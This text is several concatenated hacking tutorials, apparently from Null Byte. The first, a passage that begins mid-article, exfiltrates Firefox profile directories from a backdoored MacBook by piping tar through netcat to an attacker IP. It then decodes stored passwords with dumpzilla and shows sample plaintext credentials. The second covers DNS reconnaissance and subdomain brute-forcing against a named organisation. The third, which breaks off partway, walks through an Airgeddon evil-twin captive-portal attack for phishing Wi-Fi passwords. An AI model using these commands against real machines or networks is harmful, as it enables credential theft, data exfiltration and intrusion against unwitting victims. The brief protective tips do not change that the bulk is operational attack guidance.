dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/cert_override.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/cookies.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/downloads_dir.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/downloads_history.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/exceptions.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/extensions.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/forms.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/history.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/offlinecache.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/passwords.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/permissions.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/session.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/thumbnails.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/README.md inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/dumpzilla inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/dumpzilla.pyAfter extracting dumpzilla, change into the newly created "dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/" directory using thecdcommand.cd dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/Step 4: Elevate the File PermissionsThen, use thechmodcommand to make sure the dumpzilla.py file has permission to execute in Kali.chmod +x dumpzilla.pyStep 5: Start the Netcat ListenerWith dumpzilla all setup, start aNetcatlistener to receive the Firefox directories being sent from the backdoored MacBook.nc -l -p 9999 | tar xThis command will instruct Netcat to listen (-l) on port (-p)9999and pipe (|) the incoming data into the tar command. Tar is a command-line archiving utility available in both Kali and macOS. Thexproceeding thetarcommand tells tar to automaticallyextractand save the data (the compressed directories) coming from the Netcat pipe. Directories are compressed during the Netcat transmission to make it easier for Netcat to process the data.That's it for downloading dumpzilla and configuring Netcat to receive the Firefox data. Next, I'll show how to exfiltrate entire Firefox directories from the backdoored MacBook.Step 6: Exfiltrate Directories from the Backdoored MacBookSome readers may be aware of Firefox's ability tomanage multiple profiles. The profiles are usually utilized by computer-savvy users with a need to isolate their work, school, and personal browser history, bookmarks, and cookies.Generally, most Firefox users will have one "default" profile. On macOS, profiles are located in the below directory./Users/<USERNAME-HERE>/Library/Application Support/Firefox/Profiles/Notice the<USERNAME-HERE>portion of the directory path. Every user on the MacBook has their own Profiles/ directory. And by default, a user doesn't have read access (file permissions) to view the profiles belonging to other users.For example, if Bob's MacBook iscompromised using a fake PDFwhile he's logged into his account, the attacker will not be able to see other Firefox profiles on the MacBook that don't belong to Bob. At least not without performing privilege escalation β€” which is beyond the scope of this article.Don't Miss:How to Create a Fake PDF Trojan for macOS with AppleScriptOn the other hand, if the target MacBook wasphysically backdoored, the attacker will likely have full root (administrator) access to all of the accounts and Firefox profiles.Proceeding with the intent to only dump the Firefox profile for one individual account,remotely connect to the backdoored MacBookfor these next few commands.Change into the desired Profiles/ directory usingcd.cd '/Users/<USERNAME-HERE>/Library/Application Support/Firefox/'Then, use the belowtarcommand to compress (cf) the Profiles/ directory (and all of its contents) and direct (|) the data into the Netcat (nc) command. The attacker's system and IP address are represented as1.2.3.4, so be sure to change the IP address to the VPS or local IP address being used by the attacker.tar cf - Profiles/ | nc 1.2.3.4 9999While Netcat is transferring the directory, the terminals will have appeared to be frozen or stalled. It took about two minutes to complete the transfer when exfiltrating a Firefox profile with only 12 hours of data stored in it. I imagine a Firefox profile with months of browser history, months of browser cookies and hundreds of bookmarks could take a significate amount of time. Be patient here. If any of the data in the directories is corrupted while being exfiltrated to the Kali system, passwords saved in the Firefox profiles may not be decodable.Step 7: Decode the PasswordsBack on the Kali machine, there will be a new Profiles/ directory. In it, there will be at least one directory following the naming schemexxxxxxxx.default/. By default, Firefox automatically generates eight random characters (xxxxxxxx) and prepends them to the profile name. For example, users with multiple profiles may have directories called "w9wuahzu.work/," "ei49j03w.personal/," and "r3h84t9t.default." Each directory can be individually processed using dumpzilla.To extract passwords found in a particular Firefox profile, use thepython3 dumpzilla.py Profiles/xxxxxxxx.default/ --Passwordscommand.python3 dumpzilla.py Profiles/xxxxxxxx.default/ --Passwords ============================================================================================================= == Decode Passwords ============================================================================================================ => Source file: /tmp/dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/9kwbffy3.default/logins.json => SHA256 hash: 9df5b2c418bbb967e63b556162e6d11ed509a9a5c67580f3c79e089d954ade91 Web: https://www.facebook.com Username: [email protected] Password: DarkDante23 Web: https://accounts.google.com Username: kevin.poulsen Password: Porsche944 Web: https://www.reddit.com Username: [email protected] Password: DarkDante23 Web: https://www.amazon.com Username: [email protected] Password: DarkDante944 Web: https://login.live.com Username: [email protected] Password: DarkDante123 Web: https://www.netflix.com Username: [email protected] Password: Porsche944 Web: https://login.aliexpress.com Username: Poulsen Password: Jordan626 =============================================================================================================== == Total Information ============================================================================================================== Total Decode Passwords : 7 Total Passwords : 7How to Protect Against Web Browser AttacksDon't let this article deter you from using Firefox or mislead you to believe Google Chrome is any more secure. Google Chrome is just as vulnerable to the actions outlined in this article. Instead of looking to web browsers for protection, consider making some minor behavioral changes to make such attacks difficult for hackers.UsePrivate Browser mode. Dumpzilla can do a lot more than just extract passwords from Firefox. It's safer to use private browser mode 100% of the time. Though it may be inconvenient and make browsing the internet painful, it's actually quite dangerous to entrust so much data to web browsers. Browser data dumps containing dozens of email addresses and passwords are shared freely in black hat hacking communities. If hackers aren't selling your data, they're wreaking havoc on your accounts for amusement because it has no financial worth to them.Use aMaster password.If saving passwords in Firefox is a convenience you're not willing to give up, use astrong master password. This will provide a moderate obstacle for hackers and may prevent them from learning all of your passwords.Use a proper password manager. Password managers offer improved protection of stored passwords. Hackers can still exfiltrate and perform brute force attacks against the password manager's database but with a strong and unique password, attacker's will have to spend weeks (or months) trying to crack the encrypted database.Don't Miss:How to Manage Your Passwords with KeePassX in macOSFollow Null Byte onTwitter,Flipboard, andYouTubeFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image by tokyoneon/Null ByteRelatedHacking Windows 10:How to Steal & Decrypt Passwords Stored in Chrome & Firefox RemotelyHacking macOS:How to Dump 1Password, KeePassX & LastPass Passwords in PlaintextHow To:The Ultimate Guide to Hacking macOSHow To:Hack Your Roommate! How to Find Stored Site Passwords in Chrome and FirefoxHacking macOS:How to Hack a MacBook with One Ruby CommandHack Like a Pro:How to Hack Facebook (Facebook Password Extractor)How To:Hack Your Firefox User Agent to Spoof Your OS and BrowserHow To:Dump a MacOS User's Chrome Passwords with EvilOSXNews:8 Tips for Creating Strong, Unbreakable PasswordsHow To:Hack Facebook & Gmail Accounts Owned by MacOS TargetsHow To:Use Firefox's Secure 'Notes' App to Sync Lists & Other Notes to Your Desktop BrowserHow To:Install the Region-Locked Firefox Browser on Your iPhoneHow To:3 Reasons Firefox Quantum Is the Best Browser for AndroidHacking macOS:How to Bypass the LuLu Firewall with Google Chrome DependenciesHow To:Use Firefox Rocket to Browse the Web Faster & Save Data on Any AndroidHow To:Manage Stored Passwords So You Don't Get HackedFirefox Mobile 101:How to Turn Websites into Apps on Your Home Screen with the New Quantum BrowserHacking macOS:How to Hack a Mac Password Without Changing ItHow To:Your Phone's Biggest Security Weakness Is Its Data Connection β€” Here's How to Lock It DownHow To:Try Mozilla's Privacy-Friendly Firefox Focus Browser on Android Right NowHow To:Steal Usernames & Passwords Stored in Firefox on Windows 10 Using a USB Rubber DuckyHow To:Easily Bypass macOS High Sierra's Login Screen & Get Root (No Password Hacking Required)How To:Reveal Saved Website Passwords in Chrome and Firefox with This Simple Browser HackHow To:Comparing the 5 Best Internet Browsers for AndroidFirefox Mobile 101:How to Customize Your Browser with ThemesHow To:Find log-ins and passwords in Firefox 3 on a PC or MacNews:Firefox Mobile Just Got Faster β€” New Browser Engine Brings Quantum's Speed to AndroidFirefox Mobile 101:How to Save Links as New Tabs Without Leaving Your Current AppHow To:Stop Sites from Tracking You on Your iPhone with Firefox FocusHow To:Re-Enable Copy & Paste on Annoying Sites That Block ItHow To:Carve Saved Passwords Using CainHow To:Reveal Saved Browser Passwords with JavaScript InjectionsHow To:Install "Incompatible" Firefox Add-Ons After Upgrading to the New FirefoxHow To:Chrome Shares Your Activity with Google - Here's How to Use Comodo Dragon to Block ItHow To:amend Adobe Flash SettingsHow To:Prevent Social Networks from Tracking Your Internet ActivitiesLockdown:The InfoSecurity Guide to Securing Your Computer, Part IIHow To:Defend from Keyloggers in Firefox with Keystroke EncryptionHow To:Disable & Uninstall Mozilla Firefox Add-ons (Plug-ins, Extensions & Themes)How To:Download and Install Firefox
Hack Like a Pro: Abusing DNS for Reconnaissance Β« Null Byte :: WonderHowTo
Welcome back, my tenderfoot hackers!As you know, DNS, orDomain Name System, is critical to the operation of the Internet. It provides us with the ability to type in domain names such aswww.wonderhowto.comrather than the IP address. This simple service saves us from having to memorize thousands of our favorite website IP addresses. Instead, we simply type in a domain name to retrieve the website.Of course, the Internet is mapped by IP addresses, so this translation from domain name to IP address is essential for easy navigating. Can you imagine if we had to remember the IP address of WonderHowTo and all our other favorite sites to navigate the web? I can't, and I have a pretty good memory. This means that DNS servers contain vast amounts of data that we might use as a hacker to gain information about our potential victims.This essential and ubiquitous service can be abused for our purposes as hackers. It can reveal hidden servers that may contain confidential or key information that we might find valuable.Step 1: Dig for DNS InfoThe domain information groper, ordig, is a command that is built into every distribution ofLinuxand UNIX. It is designed to be able to grab and display for the user key DNS info. Let's open a terminal and start digging!With a terminal open, we can typedigfrom any directory as this ubiquitous command is located in the /bin directory in every version of Linux and UNIX. Let's do some digging on our friends at SANS, one of the leading information security training and consulting firms in the world.kali > dig sans.orgDig goes out to the Internet and grabs the records from your DNS server as seen above. You can see that it grabs the IP address (66.35.59.202) of the domain sans.org. The next section contains the name servers for this domain:dns31b.sans.orgdns31a.sans.orgdns21a.sans.orgdns21b.sans.orgIf we want to find their email servers, we simply add anmxto the end of the command like this:kali > dig sans.org mxAs you can see, this simple query reveals for us the four email servers that SANS utilizes. Hmmmm....very interesting. Anyone want to send anonymous, spoofed, or bulk email?Step 2: Open DnsenumKaliandBackTrackboth have a nice little tool that can do everything dig does and more. It's calleddnsenum. We can find it by going to Applications -> Information Gathering -> DNS Analysis -> dnsenum.When you do, it will open a dnsenum help screen like that below. Among the things that dnsenum can do for us is find subdomains that are not obvious or are hidden from the public. I have highlighted the section in the screenshot that addresses brute-forcing these subdomains.Step 3: Run DnsenumLet's try running this simple, but effective tool against our friends at SANS and see if we can find additional information about their servers and subdomains from querying DNS. It's probably worthwhile to note here that all of thisreconnaissanceis "passive." There is no way for the victim to know we are "casing" their systems because we are not "touching" their systems, just the DNS servers so it looks like normal traffic.kali > dnsenum sans.org -f /usr/share/dirbuster/wordlists/directories.jbrofuzzYou can use anywordlistyou have available to you that you believe may contain the name of subdomains of the organization, so choose you wordlist carefully, my tenderfoot hackers. You can find all the wordlists built into Kali by typing;kali > locate wordlistIn this case, I chose the/usr/share/dirbuster/wordlists/directories.jbrofuzzwordlist, as it has many directory names which also are often used in the names of subdomains.When we run this command, we get the following results. First, we see the name servers and the mail servers (mx) just as we did by using dig. These records also include the IP addresses of these servers. It's interesting to note that SANS is using Google mail servers. I would have thought they would use their own email servers, considering their level of IT expertise.Next, dnsenum will attempt to do a zone transfer. In this case, it failed against the DNS server.Finally, it will try to find subdomains within sans.org. Many times, companies have subdomains such as training.sans.org and admin.sans.orgβ€”dnsenum can help us find these by attempting to brute-force these potential subdomains using a wordlist. Of course, as I mentioned, the wordlist you choose will be critical to your success, but generally, these subdomain names are simple dictionary words like training, test, sales, admin, etc.Like any brute-force attempt, this can be tedious and time consuming, so be patient. If you choose a good wordlist and are patient, you are likely to find many hidden servers that the company doesn't necessarily want you to know about, but might be juicy targets. Dnsenum will not only find these servers, but will also provide you the IP address which can VERY helpful when we get around to attacking that system.I ran dnsenum for a few hours and retrieved the subdomains listed above. As you can see, it was about 50% done, having only gone through the letter "L."Dnsenum is just one more tool in our hacker toolbox that can be useful fordoing reconnaissance on potential targets. The beauty of this tool is its ability to find those hidden servers by simply abusing DNS, and the potential victim is totally unaware of any untoward activity.I'll keep showing more and more tools and techniques for hacking, so keep coming back, my tenderfoot hackers!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedNews:How to Study for the White Hat Hacker Associate Certification (CWA)Hack Like a Pro:How to Hack Web Apps, Part 2 (Website Spidering with WebScarab)How To:Advanced Penetration Testing - Part 1 (Introduction)How To:The Five Phases of HackingHack Like a Pro:The Hacker MethodologyHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 17 (Client DNS)Hack Like a Pro:How to Use Maltego to Do Network ReconnaissanceHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 6 (Networking Basics)Hack Like a Pro:Using the Nmap Scripting Engine (NSE) for ReconnaissanceHack Like a Pro:How to Perform Stealthy Reconnaissance on a Protected NetworkNews:Here's Why You Should Be Using Private DNS on Your PhoneHack Like a Pro:How to Spoof DNS on a LAN to Redirect Traffic to Your Fake WebsiteAdvanced Nmap:Top 5 Intrusive Nmap Scripts Hackers & Pentesters Should KnowHow To:Boost Internet Speeds & Hide Your Browsing History from Your ISPHack Like a Pro:How to Conduct Passive Reconnaissance of a Potential TargetHow To:5 Ways to Keep Google from Collecting Data on Your Android PhoneVideo:How to Use Maltego to Research & Mine Data Like an AnalystHack Like a Pro:Reconnaissance with Recon-Ng, Part 1 (Getting Started)How To:Unblock American Hulu, Netflix, & More on Chromecast in Other CountriesHack Like a Pro:How to Hijack Software Updates to Install a Rootkit for Backdoor AccessHow To:Hack a DNS (Domain Name System) from start to finishHow To:Secure Your Computer with Norton DNSThe Ultimate Guide:Diagnosing & Fixing Connection Issues, Part IIHow To:The Official Google+ Insider's Guide IndexHow To:Watch American Netflix in Canada Using an Apple TV
How to Hack Wi-Fi: Stealing Wi-Fi Passwords with an Evil Twin Attack Β« Null Byte :: WonderHowTo
While Wi-Fi networks can be set up by smart IT people, that doesn't mean the users of the system are similarly tech-savvy. We'll demonstrate how an evil twin attack can steal Wi-Fi passwords by kicking a user off their trusted network while creating a nearly identical fake one. This forces the victim to connect to the fake network and supply the Wi-Fi password to regain internet access.While a more technical user might spot this attack, it's surprisingly effective against those not trained to look for suspicious network activity. The reason it's so successful is that most users don't know what a real firmware update looks like, leading to confusion in recognizing that an attack is in progress.What Is an Evil Twin AttackAn evil twin attack is a typeWi-Fi attackthat works by taking advantage of the fact that most computers and phones will only see the "name" or ESSID of a wireless network. This actually makes it very hard to distinguish between networks with the same name and same kind of encryption. In fact, many networks will have several network-extending access points all using the same name to expand access without confusing users.If you want to see how this works, you can create a Wi-Fi hotspot on your phone and name it the same as your home network, and you'll notice it's hard to tell the difference between the two networks or your computer may simply see both as the same network. A network sniffing tool likeWigle Wifi on AndroidorKismetcan clearly see the difference between these networks, but to the average user, these networks will look the same.This works great for tricking a user into connecting if we have a network with the same name, same password, and same encryption, but what if we don't know the password yet? We won't be able to create a network that will trick the user into connecting automatically, but we can try asocial engineeringattack to try to force the user to give us the password by kicking them off the real network.Using a Captive Portal AttackIn a captive portal-style evil twin attack, we will use theAirgeddonwireless attack framework to try to force the user to connect to an open network with the same name as the network they trust. A captive portal is something like the screen you see when connecting to anopen network at a coffee shop, on a plane, or at a hotel. This screen that contains terms and conditions is something people are used to seeing, and we'll be using that to our advantage to create a phishing page that looks like the router is updating.Don't Miss:Using Aircrack-ng to Create an Evil Twin Access PointDeploying Airgeddon in a coffee shop.Image by Kody/Null ByteThe way we'll trick the victim into doing this is by flooding their trusted network with de-authentication packets, making it impossible to connect to the internet normally. When confronted with an internet connection that refuses to connect and won't allow any internet access, the average irritated user will discover an open Wi-Fi network with the same name as the network they are unable to connect to and assume it is related to the problem.Don't Miss:How to Build a Software-Based Wi-Fi Jammer with AirgeddonUpon connecting to the network, the victim will be redirected to a phishing page explaining that the router has updated and requires a password to proceed. If the user is gullible, they'll enter the network password here, but that's not where the fun stops. If the victim gets irritated by this inconvenience and types the wrong password, we'll need to make sure we can tell a wrong password from the right one. To do this, we'll capture a handshake from the network first, so we can check each password the user gives us and tell when the correct one is entered.Technologically Assisted Social EngineeringIn order for this attack to work, a few key requirements need to be met. First, this attack requires a user to do some ignorant things. If the target you are selecting is known for being tech-savvy, this attack may not work. An advanced user, or anyone with any cybersecurity awareness training, will spot this attack in progress and very possibly be aware that it is a relatively close-ranged attack. Against a well-defended target, you can expect this attack to be detected and even localized to find you.Second, a victim must be successfully authenticated from their network, and be frustrated enough to join a totally unknown open network that just appeared out of nowhere and has the same name of the network they trust. Further, attempting to connect to this network (on macOS) even yields a warning that the last time the network was connected to, it had a different kind of encryption.Don't Miss:Crack Weak Wi-Fi Passwords with Airgeddon on Parrot OSFinally, the victim must enter the network password into the sometimes sketchy-looking phishing page they are redirected to after joining the open network the attacker has created. There are a lot of clues that could tip a sharp user off to the fact that this page, including the wrong language, wrong brand of router (if the phishing page mentions it), or misspellings andEngrishin the text of the page. Since router pages usually look pretty ugly, these details may not stand out to anyone unfamiliar with what their router's admin page looks like.Step 1: Make Sure You Have EverythingTo prepare our evil twin access point attack, we'll need to be using Kali Linux or another supported distro. Quite a few distributions are supported, and you can check out theAirgeddon GitHubpage for more about which Airgeddon will work with.You can use aRaspberry Pi running Kali Linuxfor this with awireless network adapter, but you'll need to have access to the GUI and not be SSHed into the Pi, since you'll need to be able to open and navigate multiple windows in this multi-bash script.Finally, you'll need a good wireless network adapter for this. In our tests, we found that theTP-Link WN722N v1andPanda Wireless PAU07 cardsperformed well with these attacks. You can find more information about choosing a good wireless network adapter at the link below.More Info:The Best Wireless Network Adapters for Wi-Fi HackingStep 2: Install AirgeddonTo start using the Airgeddon wireless attack framework, we'll need to download Airgeddon and any needed programs. The developer also recommends downloading and installing a tool calledCCZEto make the output easier to understand. You can do so by typingapt-getinstall cczea terminal window.~# apt-get install ccze Reading package lists... Done Building dependency tree Reading state information... Done The following package was automatically installed and is no longer required: libgit2-27 Use 'apt autoremove' to remove it. The following NEW packages will be installed: ccze 0 upgraded, 1 newly installed, 0 to remove and 1772 not upgraded. Need to get 77.2 kB of archives. After this operation, 324 kB of additional disk space will be used. Get:1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 ccze amd64 0.2.1-4+b1 [77.2 kB] Fetched 77.2 kB in 1s (77.4 kB/s) Selecting previously unselected package ccze. (Reading database ... 411785 files and directories currently installed.) Preparing to unpack .../ccze_0.2.1-4+b1_amd64.deb ... Unpacking ccze (0.2.1-4+b1) ... Setting up ccze (0.2.1-4+b1) ... Processing triggers for man-db (2.8.5-2) ...Next, we'll install Airgeddon withgit clone.~# git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git Cloning into 'airgeddon'... remote: Enumerating objects: 6940, done. remote: Total 6940 (delta 0), reused 0 (delta 0), pack-reused 6940 Receiving objects: 100% (6940/6940), 21.01 MiB | 10.31 MiB/s, done. Resolving deltas: 100% (4369/4369), done.Then change directories and start Airgeddon with the following commands.~# cd airgeddon ~/airgeddon# sudo bash ./airgeddon.shIf you see the alien spaceship, you know you're ready to hack.************************************ Welcome ************************************ Welcome to airgeddon script v10.0 .__ .___ .___ _____ |__|______ ____ ____ __| _/__| _/____ _____ \__ \ | \_ __ \/ ___\_/ __ \ / __ |/ __ |/ _ \ / \ / __ \| || | \/ /_/ > ___// /_/ / /_/ ( <_> ) | \ (____ /__||__| \___ / \___ >____ \____ |\____/|___| / \/ /_____/ \/ \/ \/ \/ Devloped by v1s1t0r * . _.---._ . * . ' ' . . _.-~=============~-._ * . (_____________________) * * \___________/ .Step 3: Configure AirgeddonPressEnterto check the various tools the Airgeddon framework relies on. If you're missing any (it'll say "Error" next to them), you can hitYandEnterat the prompt to try and auto-install anything missing, but that generally doesn't work.Instead, open a new terminal window and typeapt-get install tool, substituting "tool" for the name of the missing tool. If that doesn't work, you can also trysudo pip install tool. You should install all the tools, otherwise, you may experience problems during your attack, especially if you are missingdnsspoof.*********************************** Welcome ************************************ This script is only for educational purposes. Be good boyz&girlz! Use it only on your own networks!! Accepted bash version (5.0.3(1)-release). Minimum required version: 4.2 Root permissions successfully detected Detecting resolution... Detected!: 1408x1024 Known compatible distros with this script: "Arch" "Backbox" "BlackArch" "CentOS" "Cyborg" "Debian" "Fedora" "Gentoo" "Kali" "Kali arm" "Mint" "OpenMandriva" "Parrot" "Parrot arm" "Pentoo" "Raspbian" "Red Hat" "SuSE" "Ubuntu" "Wifislax" Detecting system... Kali Linux Let's check if you have installed what script needs Press [Enter] key to continue... Essential tools: checking... ifconfig .... Ok iwconfig .... Ok iw .... Ok awk .... Ok airmon-ng .... Ok airodump-ng .... Ok aircrack-ng .... Ok xterm .... Ok ip .... Ok lspci .... Ok ps .... Ok Optional tools: checking... sslstrip .... Ok asleap .... Ok bettercap .... Ok packetforge-ng .... Ok etterlog .... Ok hashcat .... Ok wpaclean .... Ok john .... Ok aireplay-ng .... Ok bully .... Ok ettercap .... Ok mdk4 .... Ok hostapd .... Ok lighttpd .... Ok pixiewps .... Ok wash .... Ok openssl .... Ok dhcpd .... Ok reaver .... Ok dnsspoof .... Ok beef-xss .... Ok hostapd-wpe .... Ok iptables .... Ok crunch .... Ok Update tools: checking... curl .... Ok Your distro has all necessary essential tools. Script can continue... Press [Enter] key to continue...When you have all of the tools, proceed to the next step by pressingEnter. Next, the script will check for internet access so it can update itself if a newer version exists.The script will check for internet access looking for a newer version. Please be patient... The script is already in the latest version. It doesn't need to be updated Press [Enter] key to continue...When that is done, pressEnterto select the network adapter to use. Press the number on your keyboard that correlates to the network adapter in the list, thenEnter.***************************** Interface selection ****************************** Select an interface to work with: --------- 1. eth0 // Chipset: Intel Corporation 82540EM 2. wlan0 // 2.4Ghz // Chipset: Atheros Communications, Inc. AR9271 802.11n --------- *Hint* Every time you see a text with the prefix [PoT] acronym for "Pending of Translation", means the translation has been automatically generated and is still pending of review --------- >After we select our wireless network adapter, we'll proceed to the main attack menu.***************************** airgeddon main menu ****************************** Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz Select an option from menu: --------- 0. Exit script 1. Select another network interface 2. Put interface in monitor mode 3. Put interface in managed mode --------- 4. DoS attacks menu 5. Handshake tools menu 6. Offline WPA/WPA2 decrypt menu 7. Evil Twin attacks menu 8. WPS attacks menu 9. WEP attacks menu 10. Enterprise attacks menu --------- 11. About & Credits 12. Options and language menu --------- *Hint* If you install ccze you'll see some parts of airgeddon in a colorized way with better aspect. It's not a requirement or a dependency, but it will improve the user experience --------- >Press2andEnterto put your wireless card into monitor mode. Next, select option7andEnterfor the "Evil Twin attacks" menu, and you'll see the submenu for this attack module appear.**************************** Evil Twin attacks menu **************************** Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz Selected BSSID: None Selected channel: None Selected ESSID: None Select an option from menu: --------- 0. Return to main menu 1. Select another network interface 2. Put interface in monitor mode 3. Put interface in managed mode 4. Explore for targets (monitor mode needed) ---------------- (without sniffing, just AP) ----------------- 5. Evil Twin attack just AP ---------------------- (with sniffing) ----------------------- 6. Evil Twin AP attack with sniffing 7. Evil Twin AP attack with sniffing and sslstrip 8. Evil Twin AP attack with sniffing and bettercap-sslstrip2/BeEF ------------- (without sniffing, captive portal) ------------- 9. Evil Twin AP attack with captive portal (monitor mode needed) --------- *Hint* In order to use the Evil Twin just AP and sniffing attacks, you must have another one interface in addition to the wifi network interface will become the AP, which will provide internet access to other clients on the network. This doesn't need to be wifi, can be ethernet --------- >Step 4: Select the TargetNow that we're in our attack module, select option9andEnterfor the "Evil Twin AP attack with a captive portal." We'll need to explore for targets, so pressEnter, and you'll see a window appear that shows a list of all detected networks. You'll need to wait for a little to populate a list of all the nearby networks.An exploration looking for targets is going to be done... Press [Enter] key to continue... **************************** Exploring for targets **************************** Exploring for targets option chosen (monitor mode needed) Selected interface qlan0mon is in monitor mode. Explorations can be performed WPA/WPA2 filter enabled in scan. When started, press [Ctrl+C] to stop... Press [Enter] key to continue...Exploring for targets CH 12 ][ Elapsed: 12 s ][ 2019-12-13 05:28 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ -59 9 0 0 11 54e WPA2 CCMP PSK β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ -58 5 0 0 11 54e WPA2 CCMP PSK β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ -80 12 0 0 11 54e. WPA2 CCMP PSK β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ -79 14 0 0 6 54e. WPA2 CCMP PSK β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ -82 6 0 0 1 54e WPA2 CCMP PSK β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ -83 6 1 0 2 54e WPA2 CCMP PSK β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ -85 2 0 0 6 54e. WPA2 CCMP PSK β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ BSSID STATION PWR Rate Lost Frames Probe (not associated) 00:7E:56:97:E9:B0 -68 0 - 1 29 5 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ E8:1A:1B:D9:75:0A -38 0 -24e 0 1 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 62:38:E0:34:6A:7E -58 0 - 0e 0 1 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ DC:3A:5E:1D:3E:29 -57 0 -24 148 5After it runs for about 60 seconds, exit out of the small window, and a list of targets will appear. You'll notice that networks with someone using them appear in yellow with an asterisk next to them. This is essential since you can't trick someone into giving you the password if no one is on the network in the first place.**************************** Select target **************************** N. BSSID CHANNEL PWR ENC ESSID ------------------------------------------------------ 1)* β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 11 41% WPA2 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 2)* 